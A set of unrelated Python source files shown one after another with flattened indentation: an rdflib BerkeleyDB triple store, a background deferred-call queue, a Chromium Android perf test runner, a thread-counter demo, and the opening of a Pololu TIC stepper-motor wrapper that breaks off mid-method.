berkeleydb.py
|
import logging
from os import mkdir
from os.path import abspath, exists
from threading import Thread
from urllib.request import pathname2url
from rdflib.store import NO_STORE, VALID_STORE, Store
from rdflib.term import URIRef
def bb(u):
return u.encode("utf-8")
try:
from berkeleydb import db
has_bsddb = True
except ImportError:
has_bsddb = False
if has_bsddb:
# These are passed to bsddb when creating DBs
# passed to db.DBEnv.set_flags
ENVSETFLAGS = db.DB_CDB_ALLDB
# passed to db.DBEnv.open
ENVFLAGS = db.DB_INIT_MPOOL | db.DB_INIT_CDB | db.DB_THREAD
CACHESIZE = 1024 * 1024 * 50
# passed to db.DB.Open()
DBOPENFLAGS = db.DB_THREAD
logger = logging.getLogger(__name__)
__all__ = ["BerkeleyDB"]
class BerkeleyDB(Store):
"""\
A store that provides on-disk persistence using BerkeleyDB, a fast
key/value DB.
Prior to rdflib 6.0.0, this store implementation was known as 'Sleepycat',
after the then-current name of the Python wrapper for BerkeleyDB.
This store allows for quads as well as triples. See examples of use
in both the `examples.berkeleydb_example` and `test.test_store_berkeleydb`
files.
**NOTE on installation**:
To use this store, you must have BerkeleyDB installed on your system
separately from Python (`brew install berkeley-db` on a Mac) and also have
the BerkeleyDB Python wrapper installed (`pip install berkeleydb`).
You may need to install the BerkeleyDB Python wrapper like this:
`YES_I_HAVE_THE_RIGHT_TO_USE_THIS_BERKELEY_DB_VERSION=1 pip install berkeleydb`
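A minimal usage sketch (the path and identifier below are illustrative, not
taken from this module; fuller examples live in `examples.berkeleydb_example`):

    from rdflib import Graph, Literal, URIRef
    graph = Graph("BerkeleyDB", identifier=URIRef("urn:example:graph"))
    graph.open("/tmp/berkeleydb_store", create=True)
    graph.add((URIRef("urn:example:s"), URIRef("urn:example:p"), Literal("o")))
    graph.close()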
"""
context_aware = True
formula_aware = True
transaction_aware = False
graph_aware = True
db_env = None
def __init__(self, configuration=None, identifier=None):
if not has_bsddb:
raise ImportError("Unable to import berkeleydb, store is unusable.")
self.__open = False
self.__identifier = identifier
super(BerkeleyDB, self).__init__(configuration)
self._loads = self.node_pickler.loads
self._dumps = self.node_pickler.dumps
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier)
def _init_db_environment(self, homeDir, create=True):
if not exists(homeDir):
if create is True:
mkdir(homeDir)
# TODO: implement create method and refactor this to it
self.create(homeDir)
else:
return NO_STORE
db_env = db.DBEnv()
db_env.set_cachesize(0, CACHESIZE) # TODO
# db_env.set_lg_max(1024*1024)
db_env.set_flags(ENVSETFLAGS, 1)
db_env.open(homeDir, ENVFLAGS | db.DB_CREATE)
return db_env
def is_open(self):
return self.__open
def open(self, path, create=True):
if not has_bsddb:
return NO_STORE
homeDir = path
if self.__identifier is None:
self.__identifier = URIRef(pathname2url(abspath(homeDir)))
db_env = self._init_db_environment(homeDir, create)
if db_env == NO_STORE:
return NO_STORE
self.db_env = db_env
self.__open = True
dbname = None
dbtype = db.DB_BTREE
# auto-commit ensures that the open-call commits when transactions
# are enabled
dbopenflags = DBOPENFLAGS
if self.transaction_aware is True:
dbopenflags |= db.DB_AUTO_COMMIT
if create:
dbopenflags |= db.DB_CREATE
dbmode = 0o660
dbsetflags = 0
# create and open the DBs
self.__indicies = [
None,
] * 3
self.__indicies_info = [
None,
] * 3
for i in range(0, 3):
index_name = to_key_func(i)(
("s".encode("latin-1"), "p".encode("latin-1"), "o".encode("latin-1")),
"c".encode("latin-1"),
).decode()
index = db.DB(db_env)
index.set_flags(dbsetflags)
index.open(index_name, dbname, dbtype, dbopenflags, dbmode)
self.__indicies[i] = index
self.__indicies_info[i] = (index, to_key_func(i), from_key_func(i))
lookup = {}
for i in range(0, 8):
results = []
for start in range(0, 3):
score = 1
len = 0
for j in range(start, start + 3):
if i & (1 << (j % 3)):
score = score << 1
len += 1
else:
break
tie_break = 2 - start
results.append(((score, tie_break), start, len))
results.sort()
score, start, len = results[-1]
def get_prefix_func(start, end):
def get_prefix(triple, context):
if context is None:
yield ""
else:
yield context
i = start
while i < end:
yield triple[i % 3]
i += 1
yield ""
return get_prefix
lookup[i] = (
self.__indicies[start],
get_prefix_func(start, start + len),
from_key_func(start),
results_from_key_func(start, self._from_string),
)
self.__lookup_dict = lookup
self.__contexts = db.DB(db_env)
self.__contexts.set_flags(dbsetflags)
self.__contexts.open("contexts", dbname, dbtype, dbopenflags, dbmode)
self.__namespace = db.DB(db_env)
self.__namespace.set_flags(dbsetflags)
self.__namespace.open("namespace", dbname, dbtype, dbopenflags, dbmode)
self.__prefix = db.DB(db_env)
self.__prefix.set_flags(dbsetflags)
self.__prefix.open("prefix", dbname, dbtype, dbopenflags, dbmode)
self.__k2i = db.DB(db_env)
self.__k2i.set_flags(dbsetflags)
self.__k2i.open("k2i", dbname, db.DB_HASH, dbopenflags, dbmode)
self.__i2k = db.DB(db_env)
self.__i2k.set_flags(dbsetflags)
self.__i2k.open("i2k", dbname, db.DB_RECNO, dbopenflags, dbmode)
self.__needs_sync = False
t = Thread(target=self.__sync_run)
t.daemon = True  # setDaemon() is deprecated in favour of the daemon attribute
t.start()
self.__sync_thread = t
return VALID_STORE
def __sync_run(self):
from time import sleep, time
try:
min_seconds, max_seconds = 10, 300
while self.__open:
if self.__needs_sync:
t0 = t1 = time()
self.__needs_sync = False
while self.__open:
sleep(0.1)
if self.__needs_sync:
t1 = time()
self.__needs_sync = False
if time() - t1 > min_seconds or time() - t0 > max_seconds:
self.__needs_sync = False
logger.debug("sync")
self.sync()
break
else:
sleep(1)
except Exception as e:
logger.exception(e)
def sync(self):
if self.__open:
for i in self.__indicies:
i.sync()
self.__contexts.sync()
self.__namespace.sync()
self.__prefix.sync()
self.__i2k.sync()
self.__k2i.sync()
def close(self, commit_pending_transaction=False):
self.__open = False
self.__sync_thread.join()
for i in self.__indicies:
i.close()
self.__contexts.close()
self.__namespace.close()
self.__prefix.close()
self.__i2k.close()
self.__k2i.close()
self.db_env.close()
def add(self, triple, context, quoted=False, txn=None):
"""\
Add a triple to the store of triples.
"""
(subject, predicate, object) = triple
assert self.__open, "The Store must be open."
assert context != self, "Can not add triple directly to store"
Store.add(self, (subject, predicate, object), context, quoted)
_to_string = self._to_string
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
cspo, cpos, cosp = self.__indicies
value = cspo.get(bb("%s^%s^%s^%s^" % (c, s, p, o)), txn=txn)
if value is None:
self.__contexts.put(bb(c), b"", txn=txn)
contexts_value = cspo.get(
bb("%s^%s^%s^%s^" % ("", s, p, o)), txn=txn
) or "".encode("latin-1")
contexts = set(contexts_value.split("^".encode("latin-1")))
contexts.add(bb(c))
contexts_value = "^".encode("latin-1").join(contexts)
assert contexts_value is not None
cspo.put(bb("%s^%s^%s^%s^" % (c, s, p, o)), b"", txn=txn)
cpos.put(bb("%s^%s^%s^%s^" % (c, p, o, s)), b"", txn=txn)
cosp.put(bb("%s^%s^%s^%s^" % (c, o, s, p)), b"", txn=txn)
if not quoted:
cspo.put(bb("%s^%s^%s^%s^" % ("", s, p, o)), contexts_value, txn=txn)
cpos.put(bb("%s^%s^%s^%s^" % ("", p, o, s)), contexts_value, txn=txn)
cosp.put(bb("%s^%s^%s^%s^" % ("", o, s, p)), contexts_value, txn=txn)
self.__needs_sync = True
def __remove(self, spo, c, quoted=False, txn=None):
s, p, o = spo
cspo, cpos, cosp = self.__indicies
contexts_value = cspo.get(
"^".encode("latin-1").join(
["".encode("latin-1"), s, p, o, "".encode("latin-1")]
),
txn=txn,
) or "".encode("latin-1")
contexts = set(contexts_value.split("^".encode("latin-1")))
contexts.discard(c)
contexts_value = "^".encode("latin-1").join(contexts)
for i, _to_key, _from_key in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
if not quoted:
if contexts_value:
for i, _to_key, _from_key in self.__indicies_info:
i.put(
_to_key((s, p, o), "".encode("latin-1")),
contexts_value,
txn=txn,
)
else:
for i, _to_key, _from_key in self.__indicies_info:
try:
i.delete(_to_key((s, p, o), "".encode("latin-1")), txn=txn)
except db.DBNotFoundError:
pass # TODO: is it okay to ignore these?
def remove(self, spo, context, txn=None):
subject, predicate, object = spo
assert self.__open, "The Store must be open."
Store.remove(self, (subject, predicate, object), context)
_to_string = self._to_string
if context is not None:
if context == self:
context = None
if (
subject is not None
and predicate is not None
and object is not None
and context is not None
):
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
value = self.__indicies[0].get(bb("%s^%s^%s^%s^" % (c, s, p, o)), txn=txn)
if value is not None:
self.__remove((bb(s), bb(p), bb(o)), bb(c), txn=txn)
self.__needs_sync = True
else:
cspo, cpos, cosp = self.__indicies
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn
)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
needs_sync = True
except db.DBNotFoundError:
current = None
needs_sync = False
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, "next")()
except db.DBNotFoundError:
current = None
cursor.close()
if key.startswith(prefix):
c, s, p, o = from_key(key)
if context is None:
contexts_value = index.get(key, txn=txn) or "".encode("latin-1")
# remove triple from all non quoted contexts
contexts = set(contexts_value.split("^".encode("latin-1")))
# and from the conjunctive index
contexts.add("".encode("latin-1"))
for c in contexts:
for i, _to_key, _ in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
else:
self.__remove((s, p, o), c, txn=txn)
else:
break
if context is not None:
if subject is None and predicate is None and object is None:
# TODO: also if context becomes empty and not just on
# remove((None, None, None), c)
try:
self.__contexts.delete(
bb(_to_string(context, txn=txn)), txn=txn
)
except db.DBNotFoundError:
pass
self.__needs_sync = needs_sync
def triples(self, spo, context=None, txn=None):
"""A generator over all the triples matching"""
assert self.__open, "The Store must be open."
subject, predicate, object = spo
if context is not None:
if context == self:
context = None
# _from_string = self._from_string ## UNUSED
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn
)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
except db.DBNotFoundError:
current = None
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Cheap hack so 2to3 doesn't convert to next(cursor)
current = getattr(cursor, "next")()
except db.DBNotFoundError:
current = None
cursor.close()
if key and key.startswith(prefix):
contexts_value = index.get(key, txn=txn)
yield results_from_key(key, subject, predicate, object, contexts_value)
else:
break
def __len__(self, context=None):
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
if context is None:
prefix = "^".encode("latin-1")
else:
prefix = bb("%s^" % self._to_string(context))
index = self.__indicies[0]
cursor = index.cursor()
current = cursor.set_range(prefix)
count = 0
while current:
key, value = current
if key.startswith(prefix):
count += 1
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, "next")()
else:
break
cursor.close()
return count
def bind(self, prefix, namespace, override=True):
prefix = prefix.encode("utf-8")
namespace = namespace.encode("utf-8")
bound_prefix = self.__prefix.get(namespace)
bound_namespace = self.__namespace.get(prefix)
if override:
if bound_prefix:
self.__namespace.delete(bound_prefix)
if bound_namespace:
self.__prefix.delete(bound_namespace)
self.__prefix[namespace] = prefix
self.__namespace[prefix] = namespace
else:
self.__prefix[bound_namespace or namespace] = bound_prefix or prefix
self.__namespace[bound_prefix or prefix] = bound_namespace or namespace
def namespace(self, prefix):
prefix = prefix.encode("utf-8")
ns = self.__namespace.get(prefix, None)
if ns is not None:
return URIRef(ns.decode("utf-8"))
return None
def prefix(self, namespace):
namespace = namespace.encode("utf-8")
prefix = self.__prefix.get(namespace, None)
if prefix is not None:
return prefix.decode("utf-8")
return None
def namespaces(self):
cursor = self.__namespace.cursor()
results = []
current = cursor.first()
while current:
prefix, namespace = current
results.append((prefix.decode("utf-8"), namespace.decode("utf-8")))
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, "next")()
cursor.close()
for prefix, namespace in results:
yield prefix, URIRef(namespace)
def contexts(self, triple=None):
_from_string = self._from_string
_to_string = self._to_string
if triple:
s, p, o = triple
s = _to_string(s)
p = _to_string(p)
o = _to_string(o)
contexts = self.__indicies[0].get(bb("%s^%s^%s^%s^" % ("", s, p, o)))
if contexts:
for c in contexts.split("^".encode("latin-1")):
if c:
yield _from_string(c)
else:
index = self.__contexts
cursor = index.cursor()
current = cursor.first()
cursor.close()
while current:
key, value = current
context = _from_string(key)
yield context
cursor = index.cursor()
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, "next")()
except db.DBNotFoundError:
current = None
cursor.close()
def add_graph(self, graph):
self.__contexts.put(bb(self._to_string(graph)), b"")
def remove_graph(self, graph):
self.remove((None, None, None), graph)
def _from_string(self, i):
k = self.__i2k.get(int(i))
return self._loads(k)
def _to_string(self, term, txn=None):
k = self._dumps(term)
i = self.__k2i.get(k, txn=txn)
if i is None:
# weird behaviour from bsddb not taking a txn as a keyword argument
# for append
if self.transaction_aware:
i = "%s" % self.__i2k.append(k, txn)
else:
i = "%s" % self.__i2k.append(k)
self.__k2i.put(k, i.encode(), txn=txn)
else:
i = i.decode()
return i
def __lookup(self, spo, context, txn=None):
subject, predicate, object = spo
_to_string = self._to_string
if context is not None:
context = _to_string(context, txn=txn)
i = 0
if subject is not None:
i += 1
subject = _to_string(subject, txn=txn)
if predicate is not None:
i += 2
predicate = _to_string(predicate, txn=txn)
if object is not None:
i += 4
object = _to_string(object, txn=txn)
index, prefix_func, from_key, results_from_key = self.__lookup_dict[i]
# print (subject, predicate, object), context, prefix_func, index
# #DEBUG
prefix = bb("^".join(prefix_func((subject, predicate, object), context)))
return index, prefix, from_key, results_from_key
def to_key_func(i):
def to_key(triple, context):
"Takes a string; returns key"
return "^".encode("latin-1").join(
(
context,
triple[i % 3],
triple[(i + 1) % 3],
triple[(i + 2) % 3],
"".encode("latin-1"),
)
) # "" to tack on the trailing ^
return to_key
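# For illustration (not part of the original source): to_key_func(0) builds keys
# of the form context^s^p^o^, e.g.
#   to_key_func(0)((b"s1", b"p1", b"o1"), b"c1") == b"c1^s1^p1^o1^"
# while to_key_func(1) and to_key_func(2) rotate the triple to produce the
# cpos and cosp index keys.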
def from_key_func(i):
def from_key(key):
"Takes a key; returns string"
parts = key.split("^".encode("latin-1"))
return (
parts[0],
parts[(3 - i + 0) % 3 + 1],
parts[(3 - i + 1) % 3 + 1],
parts[(3 - i + 2) % 3 + 1],
)
return from_key
def results_from_key_func(i, from_string):
def from_key(key, subject, predicate, object, contexts_value):
"Takes a key and subject, predicate, object; returns tuple for yield"
parts = key.split("^".encode("latin-1"))
if subject is None:
# TODO: i & 1: # dis assemble and/or measure to see which is faster
# subject is None or i & 1
s = from_string(parts[(3 - i + 0) % 3 + 1])
else:
s = subject
if predicate is None: # i & 2:
p = from_string(parts[(3 - i + 1) % 3 + 1])
else:
p = predicate
if object is None: # i & 4:
o = from_string(parts[(3 - i + 2) % 3 + 1])
else:
o = object
return (
(s, p, o),
(from_string(c) for c in contexts_value.split("^".encode("latin-1")) if c),
)
return from_key
def readable_index(i):
s, p, o = "?" * 3
if i & 1:
s = "s"
if i & 2:
p = "p"
if i & 4:
o = "o"
return "%s,%s,%s" % (s, p, o)
|
deferred.py
|
import sys
import time
import traceback
from queue import Empty, Full, Queue
from threading import Lock, Thread
from ..lib import logger, reporter
from ..lib.errors import ExpectedError
from ..setup import is_same_package
# A global queue that is used for the convenience methods provided below.
_queue = Queue(maxsize=8)
def _handler(payload):
func = payload.get('func')
args = payload.get('args', [])
kwargs = payload.get('kwargs', {})
done = payload.get('done')
if func:
res = func(*args, **kwargs)
if done:
done(res)
def _pop(queue):
try:
queue.get(block=False)
except Empty:
pass
class Consumer:
"""Consumer class which consumes events from a queue. Consumption occurs
in a separate thread. Multiple consumers can consume from the same queue
since synchronization is done implicitly by the queue data type.
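An illustrative setup (the queue size and handler here are hypothetical):

    q = Queue(maxsize=8)
    consumer = Consumer(q, lambda payload: print(payload))
    consumer.start()
    ...
    consumer.stop()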
"""
def __init__(self, queue, handler):
"""Initialize a consumer. This constructor does not start consumption.
Instead, the caller of this method should also call `start` to start
consumption.
Arguments:
queue: An instance of a `Queue` class to consume events from.
handler: A function which is called on the events taken from the
queue.
"""
self.queue = queue
self.handler = handler
self.thread = None
self.lock = Lock()
self.consuming = False
def start(self):
"""Start consuming from the queue in a separate thread.
"""
with self.lock:
if self.consuming:
return
self.consuming = True
self.thread = Thread(target=self._consume)
self.thread.start()
def stop(self):
"""Stop consuming and join the underlying thread.
"""
with self.lock:
self.consuming = False
self.thread.join()
def _consume(self):
"""The consumption loop in which events are pulled from the queue
and handled by the consumer. All exceptions are caught in order to
prevent the underlying thread from stopping unnecessarily.
"""
while self.consuming:
try:
payload = self.queue.get(block=False)
self.handler(payload)
except Empty:
time.sleep(0.01)
except ExpectedError as exc:
logger.debug('caught expected {}: {}'
.format(exc.__class__.__name__, str(exc)))
except Exception as exc:
reporter.send_rollbar_exc(sys.exc_info())
logger.debug('caught {}: {}'
.format(exc.__class__.__name__, str(exc)))
def defer(func, *args, **kwargs):
"""Defer a function call to be executed asynchronously in the background.
If the queue is full, then this function call will either be ignored or
forced onto the queue depending on the presence and value of an optional
`_force` argument.
A `_force` argument can be passed into the keyword arguments to control
whether or not the function call should be forced onto the queue. If this
argument is true and the queue is full when this function is called, then
the oldest item on the queue will be dropped and the defer call will be
retried. The `_force` argument defaults to true.
A `_done` callback can be passed into the keyword arguments. If this
callback is present, it will be called on the return value of the executed
function.
Arguments:
func: The function to execute.
args: The positional arguments to pass to the function.
kwargs: The keyword arguments to pass to the function.
Returns:
True if the function call was queued successfully, False otherwise.
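Illustrative call (the upload function and its callback are hypothetical):

    defer(upload_report, report, _force=False,
          _done=lambda res: logger.debug('uploaded: {}'.format(res)))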
"""
done = kwargs.pop('_done', None)
force = kwargs.pop('_force', True)
try:
payload = {
'func': func,
'args': args,
'kwargs': kwargs,
'done': done,
}
_queue.put(payload, block=False)
return True
except Full:
if not force:
logger.debug('skipping defer because queue is full')
return False
else:
logger.debug('forcing defer because queue is full')
_pop(_queue)
kwargs.update({'_done': done, '_force': force})
return defer(func, *args, **kwargs)
def consume():
"""Create a consumer and start the consumption loop. This function needs
to be called at least once in order for the `defer` function to have any
meaningful effect.
"""
c = Consumer(_queue, _handler)
c.start()
return c
|
test_runner.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs perf tests.
Our buildbot infrastructure requires each slave to run steps serially.
This is sub-optimal for android, where these steps can run independently on
multiple connected devices.
The buildbots will run this script multiple times per cycle:
- First: all steps listed in --steps will be executed in parallel using all
connected devices. Step results will be pickled to disk. Each step has a unique
name. The result code will be ignored if the step name is listed in
--flaky-steps.
The buildbot will treat this step as a regular step, and will not process any
graph data.
- Then, with --print-step STEP_NAME: at this stage, we'll simply print the file
with the step results previously saved. The buildbot will then process the graph
data accordingly.
The JSON steps file contains a list in the format:
[
["step_name_foo", "script_to_execute foo"],
["step_name_bar", "script_to_execute bar"]
]
This preserves the order in which the steps are executed.
The JSON flaky steps file contains a list of step names whose results should
be ignored:
[
"step_name_foo",
"step_name_bar"
]
Note that script_to_execute necessarily has to take at least the following
option:
--device: the serial number to be passed to all adb commands.
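Illustrative invocations for the two phases described above (file and step
names are hypothetical):
    test_runner.py --steps perf_steps.json --flaky-steps flaky_steps.json
    test_runner.py --print-step step_name_foo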
"""
import datetime
import logging
import os
import pickle
import sys
import threading
import time
from pylib import constants
from pylib import forwarder
from pylib import pexpect
from pylib.base import base_test_result
from pylib.base import base_test_runner
def PrintTestOutput(test_name):
"""Helper method to print the output of previously executed test_name.
Args:
test_name: name of the test that has been previously executed.
Returns:
exit code generated by the test step.
"""
file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name)
if not os.path.exists(file_name):
logging.error('File not found %s', file_name)
return 1
with file(file_name, 'r') as f:
persisted_result = pickle.loads(f.read())
logging.info('*' * 80)
logging.info('Output from:')
logging.info(persisted_result['cmd'])
logging.info('*' * 80)
print persisted_result['output']
return persisted_result['exit_code']
def PrintSummary(test_names):
logging.info('*' * 80)
logging.info('Sharding summary')
total_time = 0
for test_name in test_names:
file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name)
if not os.path.exists(file_name):
logging.info('%s : No status file found', test_name)
continue
with file(file_name, 'r') as f:
result = pickle.loads(f.read())
logging.info('%s : exit_code=%d in %d secs at %s',
result['name'], result['exit_code'], result['total_time'],
result['device'])
total_time += result['total_time']
logging.info('Total steps time: %d secs', total_time)
class _HeartBeatLogger(object):
# How often to print the heartbeat on flush().
_PRINT_INTERVAL = 30.0
def __init__(self):
"""A file-like class for keeping the buildbot alive."""
self._len = 0
self._tick = time.time()
self._stopped = threading.Event()
self._timer = threading.Thread(target=self._runner)
self._timer.start()
def _runner(self):
while not self._stopped.is_set():
self.flush()
self._stopped.wait(_HeartBeatLogger._PRINT_INTERVAL)
def write(self, data):
self._len += len(data)
def flush(self):
now = time.time()
if now - self._tick >= _HeartBeatLogger._PRINT_INTERVAL:
self._tick = now
print '--single-step output length %d' % self._len
sys.stdout.flush()
def stop(self):
self._stopped.set()
class TestRunner(base_test_runner.BaseTestRunner):
def __init__(self, test_options, device, tests, flaky_tests):
"""A TestRunner instance runs a perf test on a single device.
Args:
test_options: A PerfOptions object.
device: Device to run the tests.
tests: a dict mapping test_name to command.
flaky_tests: a list of flaky test_name.
"""
super(TestRunner, self).__init__(device, None, 'Release')
self._options = test_options
self._tests = tests
self._flaky_tests = flaky_tests
@staticmethod
def _IsBetter(result):
if result['actual_exit_code'] == 0:
return True
pickled = os.path.join(constants.PERF_OUTPUT_DIR,
result['name'])
if not os.path.exists(pickled):
return True
with file(pickled, 'r') as f:
previous = pickle.loads(f.read())
return result['actual_exit_code'] < previous['actual_exit_code']
@staticmethod
def _SaveResult(result):
if TestRunner._IsBetter(result):
with file(os.path.join(constants.PERF_OUTPUT_DIR,
result['name']), 'w') as f:
f.write(pickle.dumps(result))
def _LaunchPerfTest(self, test_name):
"""Runs a perf test.
Args:
test_name: the name of the test to be executed.
Returns:
A tuple containing (Output, base_test_result.ResultType)
"""
try:
logging.warning('Unmapping device ports')
forwarder.Forwarder.UnmapAllDevicePorts(self.adb)
self.adb.RestartAdbdOnDevice()
except Exception as e:
logging.error('Exception when tearing down device %s', e)
cmd = ('%s --device %s' %
(self._tests[test_name], self.device))
logging.info('%s : %s', test_name, cmd)
start_time = datetime.datetime.now()
timeout = 5400
if self._options.no_timeout:
timeout = None
full_cmd = cmd
if self._options.dry_run:
full_cmd = 'echo %s' % cmd
logfile = sys.stdout
if self._options.single_step:
# Just print a heart-beat so that the outer buildbot scripts won't timeout
# without response.
logfile = _HeartBeatLogger()
cwd = os.path.abspath(constants.DIR_SOURCE_ROOT)
if full_cmd.startswith('src/'):
cwd = os.path.abspath(os.path.join(constants.DIR_SOURCE_ROOT, os.pardir))
output, exit_code = pexpect.run(
full_cmd, cwd=cwd,
withexitstatus=True, logfile=logfile, timeout=timeout,
env=os.environ)
if self._options.single_step:
# Stop the logger.
logfile.stop()
end_time = datetime.datetime.now()
if exit_code is None:
exit_code = -1
logging.info('%s : exit_code=%d in %d secs at %s',
test_name, exit_code, (end_time - start_time).seconds,
self.device)
result_type = base_test_result.ResultType.FAIL
if exit_code == 0:
result_type = base_test_result.ResultType.PASS
actual_exit_code = exit_code
if test_name in self._flaky_tests:
# The exit_code is used at the second stage when printing the
# test output. If the test is flaky, force to "0" to get that step green
# whilst still gathering data to the perf dashboards.
# The result_type is used by the test_dispatcher to retry the test.
exit_code = 0
persisted_result = {
'name': test_name,
'output': output,
'exit_code': exit_code,
'actual_exit_code': actual_exit_code,
'result_type': result_type,
'total_time': (end_time - start_time).seconds,
'device': self.device,
'cmd': cmd,
}
self._SaveResult(persisted_result)
return (output, result_type)
def RunTest(self, test_name):
"""Run a perf test on the device.
Args:
test_name: String to use for logging the test result.
Returns:
A tuple of (TestRunResults, retry).
"""
output, result_type = self._LaunchPerfTest(test_name)
results = base_test_result.TestRunResults()
results.AddResult(base_test_result.BaseTestResult(test_name, result_type))
retry = None
if not results.DidRunPass():
retry = test_name
return results, retry
|
01ThreadCounter.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# -----------------------------------------------------------------------------------------------------------
# Name: 01ThreadCounter.py
# Purpose: Simple thread counter
#
# Author: Gabriel Marti Fuentes
# email: gabimarti at gmail dot com
# GitHub: https://github.com/gabimarti
# Created: 02/08/2019
# Version: 1.0
# Revision:
# License: MIT
# -----------------------------------------------------------------------------------------------------------
#
import argparse
import random
import threading
import time
########################################################
# CONSTANTS
########################################################
DESCRIPTION = 'A simple thread counter'
EPILOG = 'What do you want me to tell you?'
MAXTHREADS = 10000
DELAYBETWEENTHREADS = 0 # Milliseconds of delay between threads
VERBOSE_LEVELS = ['basic', 'a few', 'insane info'] # Verbose levels description
MAXRANDOMSLEEP = 10 # Max time in seconds for random sleep
########################################################
# VARIABLES
########################################################
thread_counter = 0 # Total executed threads
thread_active_counter = 0 # Number of current active threads
thread_list = [] # List of active threads
max_threads = MAXTHREADS # Max threads
verbose = 0 # Verbose level
delay_threads = DELAYBETWEENTHREADS # Delay between threads
max_random_sleep = MAXRANDOMSLEEP # Max random sleep
total_sleep_seconds = 0 # Total seconds of sleep performed
average_sleep = 0 # Average sleep executed
########################################################
# FUNCTIONS
########################################################
# Wait for the indicated time in milliseconds
def delay_milliseconds(millisec):
if millisec == 0:
return None # Avoid making unnecessary call to time.sleep function
time.sleep(millisec/1000)
# Wait a random time
def do_something_more(thread_id, max_random_sleep, verbose):
global thread_counter, total_sleep_seconds
seconds = random.randint(0, max_random_sleep)  # randint's upper bound is inclusive, so no +1
total_sleep_seconds += seconds
if verbose == 1:
print('.', end='')
if verbose >= 2:
print('Begin thread id %d : Active counter %d : Random Sleep %d' % (thread_id, thread_active_counter, seconds))
time.sleep(seconds)
if verbose >= 2:
print('End thread id %d : Active counter %d ' % (thread_id, thread_active_counter))
# Increase counters and call auxiliary function
def do_something(thread_id, max_random_sleep, verbose):
global thread_counter, thread_active_counter
thread_counter += 1
thread_active_counter += 1
do_something_more(thread_id, max_random_sleep, verbose)
thread_active_counter -= 1
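# Note: the bare "+=" updates on the shared counters above are not atomic across
# threads. A hedged alternative (not part of the original script) would guard
# them with a lock, e.g.:
#   counter_lock = threading.Lock()
#   with counter_lock:
#       thread_counter += 1
#       thread_active_counter += 1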
# Parse command line parameters
def parse_params():
parser = argparse.ArgumentParser(description=DESCRIPTION, epilog=EPILOG)
parser.add_argument('-m', '--maxthreads', type=int, default=MAXTHREADS,
help='Indicates the maximum number of threads. Default value: ' + str(MAXTHREADS))
parser.add_argument('-d', '--delay', type=int, default=DELAYBETWEENTHREADS,
help='Milliseconds of delay between threads call. Default value: ' + str(DELAYBETWEENTHREADS))
parser.add_argument('-s', '--randomsleep', type=int, default=MAXRANDOMSLEEP,
help='Max random sleep in seconds for every process. Default value: ' + str(MAXRANDOMSLEEP))
parser.add_argument('-v', '--verbose', type=int, choices=[0, 1, 2], default=0,
help='Increase output verbosity. Default value: 0')
args = parser.parse_args()
return args
# Main
def main():
global max_threads, delay_threads, verbose, max_random_sleep
# Check and parse parameters
args = parse_params()
verbose = args.verbose
max_threads = args.maxthreads
delay_threads = args.delay
max_random_sleep = args.randomsleep
if max_threads < 1: # avoid zero division
max_threads = 1
print('Verbose level '+str(VERBOSE_LEVELS[verbose]))
print('Max %d Threads ' % (max_threads))
print('Delay between Threads %d milliseconds' % (delay_threads))
print('Max random Sleep for every process %d seconds' % (max_random_sleep))
print('Launching ...')
start = time.perf_counter()
# Launch threads and execute function do_something()
for t_id in range(1, int(max_threads)+1):
thread_handler = threading.Thread(target=do_something, args=(t_id, max_random_sleep, verbose))
thread_handler.start()
thread_list.append(thread_handler)
delay_milliseconds(delay_threads) # delay between threads
if verbose >= 1:
print('Finished threads launch.')
print('Total threads %d : Current active %d' % (thread_counter, thread_active_counter))
partialtime = time.perf_counter() - start
print('Launched %d threads in %6.2f seconds ' % (thread_counter, partialtime))
# Wait to finish threads
for thread_wait in thread_list:
thread_wait.join()
totaltime = time.perf_counter() - start
average_sleep = total_sleep_seconds / thread_counter
print('Performed %d threads in %6.2f seconds ' % (thread_counter, totaltime))
print('Current active threads %d' % (thread_active_counter))
print('Total sleep %d (shared) seconds for all threads' % (total_sleep_seconds))
print('Average sleep %6.2f seconds' % (average_sleep))
if __name__ == '__main__':
main()
|
pololu_ticcmd_wrapper.py
|
"""Pololu TIC Device."""
import subprocess
import logging
import asyncio
from threading import Thread
import ruamel.yaml
from mpf.core.utility_functions import Util
class TicError(Exception):
"""A Pololu TIC Error."""
class PololuTiccmdWrapper:
"""A Pololu TIC Device."""
def __init__(self, serial_number, machine, debug=True):
"""Initialise the ticcmd wrapper for a Pololu TIC device.
Args:
serial_number (number): The serial number of the TIC to control
machine (object): The machine object
debug (boolean): Turn on debugging or not
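Illustrative usage (the serial number below is hypothetical):

    tic = PololuTiccmdWrapper("00123456", machine)
    tic.energize()
    tic.rotate_to_position(2000)
    tic.stop()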
"""
self._debug = debug
self.log = logging.getLogger('TIC Stepper')
self._serial_number = serial_number
self._machine = machine
self.loop = None
self._start_thread()
def _start_thread(self):
# Create a new loop
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.stop_future = asyncio.Future()
# Assign the loop to another thread
self.thread = Thread(target=self._run_loop)
self.thread.start()
def _run_loop(self):
"""Run the asyncio loop in this thread."""
